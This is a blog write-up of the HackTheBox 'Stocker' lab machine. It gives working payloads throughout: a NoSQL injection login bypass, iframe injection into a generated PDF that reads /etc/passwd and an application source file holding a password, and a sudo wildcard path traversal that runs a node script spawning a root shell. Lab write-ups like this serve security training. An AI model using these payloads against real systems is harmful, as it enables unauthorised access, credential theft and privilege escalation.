<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="HackTheBox - Stocker" /><meta property="og:locale" content="en" /><meta name="description" content="Overview Machine begins with a subdomain enumeration, discovering dev.stocker.htb, where it is susceptible to a NoSQLi login bypass. Exploiting this vulnerability granted access to the cart checkout page, which was found to be vulnerable to a cross-site scripting to local file inclusion (XSS2LFI) attack. By leveraging the XSS vulnerability, it was possible to perform local file inclusion (LFI) and gain access to the index.js file, which contained credentials for the user angoose." /><meta property="og:description" content="Overview Machine begins with a subdomain enumeration, discovering dev.stocker.htb, where it is susceptible to a NoSQLi login bypass. Exploiting this vulnerability granted access to the cart checkout page, which was found to be vulnerable to a cross-site scripting to local file inclusion (XSS2LFI) attack. By leveraging the XSS vulnerability, it was possible to perform local file inclusion (LFI) and gain access to the index.js file, which contained credentials for the user angoose." /><link rel="canonical" href="https://yufongg.github.io/posts/Stocker/" /><meta property="og:url" content="https://yufongg.github.io/posts/Stocker/" /><meta property="og:site_name" content="Yufong" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2023-06-10T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox - Stocker" /><meta name="twitter:site" content="@yufongg" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-06-09T02:05:28+08:00","datePublished":"2023-06-10T00:00:00+08:00","description":"Overview Machine begins with a subdomain enumeration, discovering dev.stocker.htb, where it is susceptible to a NoSQLi login bypass. Exploiting this vulnerability granted access to the cart checkout page, which was found to be vulnerable to a cross-site scripting to local file inclusion (XSS2LFI) attack. By leveraging the XSS vulnerability, it was possible to perform local file inclusion (LFI) and gain access to the index.js file, which contained credentials for the user angoose.","headline":"HackTheBox - Stocker","mainEntityOfPage":{"@type":"WebPage","@id":"https://yufongg.github.io/posts/Stocker/"},"url":"https://yufongg.github.io/posts/Stocker/"}</script><title>HackTheBox - Stocker | Yufong</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Yufong"><meta name="application-name" content="Yufong"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/Vulnhub/Linux/Bob 1.0.1/images/koko.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Yufong</a></div><div class="site-subtitle font-italic">OSCP | Infosec Writeups</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/yufongg" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://www.youtube.com/watch?v=7hjHZOc-e4w" aria-label="youtube" target="_blank" rel="noopener"> <i class="fab fa-youtube"></i> </a> <a href="http://discordapp.com/users/175250797578158080" aria-label="discord" target="_blank" rel="noopener"> <i class="fab fa-discord"></i> </a> <a href="https://www.hackthebox.com/home/users/profile/834331" aria-label="hackthebox" target="_blank" rel="noopener"> <i class="fa fa-cube"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>HackTheBox - Stocker</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 400'%3E%3C/svg%3E" data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230625002217.png" class="preview-img bg" alt="Preview Image" width="1000" height="400" data-proofer-ignore><h1 data-toc-skip>HackTheBox - Stocker</h1><div class="post-meta text-muted"><div> By <em> <a href="https://github.com/yufongg">yufongg</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1686326400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2023-06-10 </em> </span> <span> Updated <em class="timeago" data-ts="1749405928" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2025-06-09 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="602 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><h1 id="overview">Overview</h1><p>Machine begins with a subdomain enumeration, discovering <code class="language-plaintext highlighter-rouge">dev.stocker.htb</code>, where it is susceptible to a <code class="language-plaintext highlighter-rouge">NoSQLi</code> login bypass. Exploiting this vulnerability granted access to the cart checkout page, which was found to be vulnerable to a cross-site scripting to local file inclusion (XSS2LFI) attack. By leveraging the XSS vulnerability, it was possible to perform local file inclusion (LFI) and gain access to the <code class="language-plaintext highlighter-rouge">index.js</code> file, which contained credentials for the user <code class="language-plaintext highlighter-rouge">angoose</code>.</p><p>Next, it was observed that the user <code class="language-plaintext highlighter-rouge">angoose</code> possessed the privilege to execute the command <code class="language-plaintext highlighter-rouge">sudo /usr/bin/node /usr/local/scripts/*.js</code>. The usage of the wildcard (<code class="language-plaintext highlighter-rouge">*</code>) in the command created a vulnerability that allowed for directory traversal, enabling the execution of a malicious payload. privilege escalating us to <code class="language-plaintext highlighter-rouge">root</code>.</p><hr /><div class="table-wrapper"><table><thead><tr><th>Column<th>Details<tbody><tr><td>Box Name<td>Stocker<tr><td>IP<td>10.10.11.196<tr><td>Points<td>20<tr><td>Difficulty<td>Easy<tr><td>Creator<td><a href="https://www.hackthebox.com/home/users/profile/269501">JoshSH</a><tr><td>Release Date<td>14 Jan 2023</table></div><h1 id="recon">Recon</h1><h2 id="tcp80-http">TCP/80 (HTTP) <a href="#tcp80-http" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ul><li>FFUF<ul><li>Could not enumerate any interesting files</ul><li>Enumerate for subdomains<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>  ┌──(root💀kali)-[~/htb/stocker]
  └─# ffuf -u http://stocker.htb -H "Host: FUZZ.stocker.htb" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fc 301
	
  dev                     [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 249ms]
</pre></table></code></div></div><blockquote class="prompt-info"><div><p><code class="language-plaintext highlighter-rouge">dev.stocker.htb</code> - add it to your <code class="language-plaintext highlighter-rouge">/etc/hosts</code></p></div></blockquote></ul><h1 id="initial-foothold">Initial Foothold</h1><h2 id="tcp80-http---nosqli">TCP/80 (HTTP) - NoSQLi <a href="#tcp80-http---nosqli" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Proceed to <code class="language-plaintext highlighter-rouge">http://dev.stocker.htb</code>, found a login page<li>With <code class="language-plaintext highlighter-rouge">webappalyzer</code> found that page is running on <code class="language-plaintext highlighter-rouge">node.js</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230610175108.png" alt="" data-proofer-ignore><blockquote class="prompt-info"><div><p>Since it is <code class="language-plaintext highlighter-rouge">node.js</code> , we can try NoSQLi</p></div></blockquote><li>NoSQLi worked<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre> # Payload
 POST /login HTTP/1.0
 Host: dev.stocker.htb
 User-Agent: Mozilla/5.0 (Hydra Proxy)
 Content-Length: 59
 Content-Type: application/json
 Cookie: connect.sid=s%3AqAR-6lAK22yFu_5EbRGEq3zlLw0ch7dB.fQcRonylfrEFjjkKqs6H6wQgHouF%2FBB7btxpEfskgbA
 Connection: close
	
 {"username": {"$ne": null}, "password": {"$ne": null} }
</pre></table></code></div></div><blockquote class="prompt-info"><div><ul><li>Change content type to <code class="language-plaintext highlighter-rouge">application/json</code></ul></div></blockquote><li>Demo - NoSQLi <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/uLV6UuMCM9.gif" alt="" data-proofer-ignore><li>Web directory <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230610233351.png" alt="" data-proofer-ignore><blockquote class="prompt-info"><div><p><code class="language-plaintext highlighter-rouge">/var/www/dev/</code></p></div></blockquote></ol><h2 id="tcp80---xss2lfi">TCP/80 - XSS2LFI <a href="#tcp80---xss2lfi" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Add items to cart and checkout, intercept w/ <code class="language-plaintext highlighter-rouge">burp</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230610232347.png" alt="" data-proofer-ignore><blockquote class="prompt-info"><div><p>There are a lot of parameters that could be vulnerable, we’ll have to try them one by one</p></div></blockquote><li>Download the purchase order to look at the metadata w/ <code class="language-plaintext highlighter-rouge">exiftool</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/stocker/10.10.11.196/exploit]
 └─# exiftool asdf.pdf
 ExifTool Version Number         : 12.44
 File Name                       : asdf.pdf
 Directory                       : .
 File Size                       : 41 kB
 File Modification Date/Time     : 2023:06:10 23:10:55+08:00
 File Access Date/Time           : 2023:06:10 23:10:54+08:00
 File Inode Change Date/Time     : 2023:06:10 23:11:06+08:00
 File Permissions                : -rw-r--r--
 File Type                       : PDF
 File Type Extension             : pdf
 MIME Type                       : application/pdf
 PDF Version                     : 1.4
 Linearized                      : No
 Page Count                      : 1
 Tagged PDF                      : Yes
 Creator                         : Chromium
 Producer                        : Skia/PDF m108
 Create Date                     : 2023:06:10 15:05:00+00:00
 Modify Date                     : 2023:06:10 15:05:00+00:00
</pre></table></code></div></div><blockquote class="prompt-info"><div><p><code class="language-plaintext highlighter-rouge">Skia/PDF m108</code> - Google it</p></div></blockquote><li><code class="language-plaintext highlighter-rouge">title</code> parameter is susceptible to <code class="language-plaintext highlighter-rouge">XSS</code>, allowing us to do LFI<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 "title":"&lt;iframe src=/etc/passwd&gt;",
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230610233121.png" alt="" data-proofer-ignore></p><li>View <code class="language-plaintext highlighter-rouge">index.js</code> (Because web running on <code class="language-plaintext highlighter-rouge">node.js</code>)<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 "title":"&lt;iframe width=1000 height=1000 src=/var/www/dev/index.js&gt;&lt;/iframe&gt;"
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/Pasted%20image%2020230610234140.png" alt="" data-proofer-ignore></p><blockquote class="prompt-info"><div><p><code class="language-plaintext highlighter-rouge">dev:IHeardPassphrasesArePrettySecure</code></p></div></blockquote></ol><h2 id="tcp22-ssh">TCP/22 (SSH) <a href="#tcp22-ssh" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Since <code class="language-plaintext highlighter-rouge">dev</code> user does not exist, <code class="language-plaintext highlighter-rouge">ssh</code> into user <code class="language-plaintext highlighter-rouge">angoose</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/stocker/10.10.11.196/exploit]
 └─# sshpass -p 'IHeardPassphrasesArePrettySecure' ssh angoose@stocker.htb
 Last login: Sat Jun 10 00:32:45 2023 from 10.10.14.2
 angoose@stocker:~$ id;whoami
 uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
 angoose
 angoose@stock
</pre></table></code></div></div></ol><h1 id="privilege-escalation">Privilege Escalation</h1><h2 id="root---wildcard--node-sudo">Root - Wildcard + Node Sudo <a href="#root---wildcard--node-sudo" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>User <code class="language-plaintext highlighter-rouge">angoose</code> sudo access<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre> angoose@stocker:/var/www/dev$ sudo -l
 Matching Defaults entries for angoose on stocker:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
	
 User angoose may run the following commands on stocker:
     (ALL) /usr/bin/node /usr/local/scripts/*.js
</pre></table></code></div></div><blockquote class="prompt-info"><div><ul><li>The usage of <code class="language-plaintext highlighter-rouge">*</code> makes this sudo privilege vulnerable, we are able to do directory traversal and point <code class="language-plaintext highlighter-rouge">/usr/bin/node</code> to any file we want<li><code class="language-plaintext highlighter-rouge">/usr/local/scripts/../../../../../../tmp/something.js</code> works</ul></div></blockquote><li>Create payload <code class="language-plaintext highlighter-rouge">/tmp/exploit.js</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre> angoose@stocker:/var/www/dev$ nano /tmp/exploit.js
 require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
 angoose@stocker:/var/www/dev$ chmod +x /tmp/exploit.js
</pre></table></code></div></div><li>Execute our exploit w/ <code class="language-plaintext highlighter-rouge">/usr/bin/node</code> to <code class="language-plaintext highlighter-rouge">root</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 sudo /usr/bin/node /usr/local/scripts/../../../../../../../tmp/exploit.js
</pre></table></code></div></div><li>Demo - <code class="language-plaintext highlighter-rouge">Node</code> sudo + wildcard <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Stocker/images/WVtAYUrw1W.gif" alt="" data-proofer-ignore></ol></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/hackthebox-linux/'>HackTheBox - Linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/xss/" class="post-tag no-text-decoration" >xss</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >lfi</a> <a href="/tags/nosqli/" class="post-tag no-text-decoration" >nosqli</a> <a href="/tags/wildcard/" class="post-tag no-text-decoration" >wildcard</a> <a href="/tags/node/" class="post-tag no-text-decoration" >node</a> <a href="/tags/pdf/" class="post-tag no-text-decoration" >pdf</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - Stocker - Yufong&amp;u=https://yufongg.github.io/posts/Stocker/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="" data-toggle="tooltip" data-placement="top" title="" target="_blank" rel="noopener" aria-label=""> <i class="fa-fw "></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recent Update</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Blunder/">HackTheBox - Blunder</a><li><a href="/posts/Attacktive-Directory/">TryHackMe - Attacktive Directory</a><li><a href="/posts/Tommy-Boy-1/">Vulnhub - Tommy Boy 1</a><li><a href="/posts/Tiki-1/">Vulnhub - Tiki 1</a><li><a href="/posts/Breach-1/">Vulnhub - Breach 1</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/tcp-80-http-web-app-cms-exploit/">tcp/80-http/web-app-cms-exploit</a> <a class="post-tag" href="/tags/linux-priv-esc-linux-creds-found/">linux-priv-esc/linux-creds-found</a> <a class="post-tag" href="/tags/exploit-file-inclusion-lfi/">exploit/file-inclusion/lfi</a> <a class="post-tag" href="/tags/linux-priv-esc-sudo-gtfo-bin/">linux-priv-esc/sudo/gtfo-bin</a> <a class="post-tag" href="/tags/exploit-command-injection/">exploit/command-injection</a> <a class="post-tag" href="/tags/linux-priv-esc-kernel-exploit/">linux-priv-esc/kernel-exploit</a> <a class="post-tag" href="/tags/cryptography/">cryptography</a> <a class="post-tag" href="/tags/exploit-sqli-database-enum/">exploit/sqli/database-enum</a> <a class="post-tag" href="/tags/pivot/">pivot</a> <a class="post-tag" href="/tags/exploit-file-upload-bypass/">exploit/file-upload-bypass</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Blunder/"><div class="card-body"> <em class="timeago small" data-ts="1672502400" > 2023-01-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Blunder</h3><div class="text-muted small"><p> Overview This machine begins w/ a web enumeration, discovering bludit CMS running, it is vulnerable to a bruteforce protection bypass, directory traversal + image upload exec vulnerability. With ce...</p></div></div></a></div><div class="card"> <a href="/posts/UpDown/"><div class="card-body"> <em class="timeago small" data-ts="1674403200" > 2023-01-23 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - UpDown</h3><div class="text-muted small"><p> Overview This machine begins w/ a web enumeration, /dev/.git is discovered, since .git is found, we are able to view the logs and commits of the git repository, providing us w/ the header needed to...</p></div></div></a></div><div class="card"> <a href="/posts/MetaTwo/"><div class="card-body"> <em class="timeago small" data-ts="1682870400" > 2023-05-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - MetaTwo</h3><div class="text-muted small"><p> Overview The machine begins with a web enumeration which led to the discovery of a vulnerable version of WordPress 5.6.2 and a vulnerable plugin, Booking Press 1.0.10. The plugin Booking Press 1.0...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/MetaTwo/" class="btn btn-outline-primary" prompt="Older"><p>HackTheBox - MetaTwo</p></a> <a href="/posts/Baby-Web/" class="btn btn-outline-primary" prompt="Newer"><p>Baby Web</p></a></div><div id="disqus_thread" class="pt-2 pb-2"><p class="text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script type="text/javascript"> var disqus_config = function () { this.page.url = 'https://yufongg.github.io/posts/Stocker/'; this.page.identifier = '/posts/Stocker/'; }; /* Lazy loading */ var disqus_observer = new IntersectionObserver(function (entries) { if(entries[0].isIntersecting) { (function () { var d = document, s = d.createElement('script'); s.src = 'https://yufongg-github-io.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); disqus_observer.disconnect(); } }, { threshold: [0] }); disqus_observer.observe(document.querySelector('#disqus_thread')); /* Auto switch theme */ function reloadDisqus() { /* Disqus hasn't been loaded */ if (typeof DISQUS === "undefined") { return; } if (document.readyState == 'complete') { DISQUS.reset({ reload: true, config: disqus_config }); } } const modeToggle = document.querySelector(".mode-toggle"); if (typeof modeToggle !== "undefined") { /* modeToggle.addEventListener('click', reloadDisqus); // not pretty for 'color-scheme' */ window.matchMedia('(prefers-color-scheme: dark)').addEventListener('change', reloadDisqus); } </script></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/yufongg">yufongg</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/tcp-80-http-web-app-cms-exploit/">tcp/80-http/web-app-cms-exploit</a> <a class="post-tag" href="/tags/linux-priv-esc-linux-creds-found/">linux-priv-esc/linux-creds-found</a> <a class="post-tag" href="/tags/exploit-file-inclusion-lfi/">exploit/file-inclusion/lfi</a> <a class="post-tag" href="/tags/linux-priv-esc-sudo-gtfo-bin/">linux-priv-esc/sudo/gtfo-bin</a> <a class="post-tag" href="/tags/exploit-command-injection/">exploit/command-injection</a> <a class="post-tag" href="/tags/linux-priv-esc-kernel-exploit/">linux-priv-esc/kernel-exploit</a> <a class="post-tag" href="/tags/cryptography/">cryptography</a> <a class="post-tag" href="/tags/exploit-sqli-database-enum/">exploit/sqli/database-enum</a> <a class="post-tag" href="/tags/pivot/">pivot</a> <a class="post-tag" href="/tags/exploit-file-upload-bypass/">exploit/file-upload-bypass</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-LS5TVPBBZE"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-LS5TVPBBZE'); }); </script>
